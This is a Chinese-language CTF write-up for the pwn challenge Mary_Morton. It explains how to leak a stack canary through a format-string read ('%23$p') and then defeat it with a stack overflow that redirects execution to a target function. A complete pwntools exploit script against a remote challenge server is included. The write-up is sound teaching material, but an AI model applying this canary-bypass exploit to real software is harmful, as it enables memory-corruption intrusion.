ctf(pwn) canary保護機制講解 與 破解方法介紹

程序執行流程

有三個選項,1是利用棧溢出,2是利用格式化字符串,3是退出;可連續輸入多次;

IDA分析

解題思路

程序存在canary保護,利用格式化字符串漏洞 得到canary的位置, 在利用棧溢出覆蓋它,返回地址改為目標函數 4008da

EXP

from pwn import * r=remote('111.200.241.244',58448) r.sendlineafter("3. Exit the battle ",'2') #先進入格式化字符串利用 r.sendline("%23$p") r.recvuntil("0x") canary=int(r.recv(16),16) #長度16位 取16進制 r.sendlineafter("3. Exit the battle ",'1') #再進入棧溢出利用 payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da) r.send(payload) r.interactive()

EXP解讀

r.sendline("%23$p")
0x90-8h=0x88

0x88/0x8=0x11(十進制17)
這里除以8是因為(我翻了一下匯編語言這一本書):

8bit組成1個Byte,也就是一個字節

微型機存儲器的存儲單元可以存儲一個字節,即8個二進制位

一個存儲器有128個存儲單元,它可存儲128個字節

往后找17+6=23個地址上即存canary的值

這里加6是 print輸入的偏移量
可以看看 CTF(pwn)-格式化字符串漏洞講解(二) --攻防世界CGfsb

2.payload='a'*0x88+p64(canary)+'a'*8+p64(0x4008da)

有問題的評論區留言吧,我會回的?

總結

以上是生活随笔為你收集整理的攻防世界(pwn)--Mary_Morton 利用格式化字符串+栈溢出破解Canary的保护机制的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。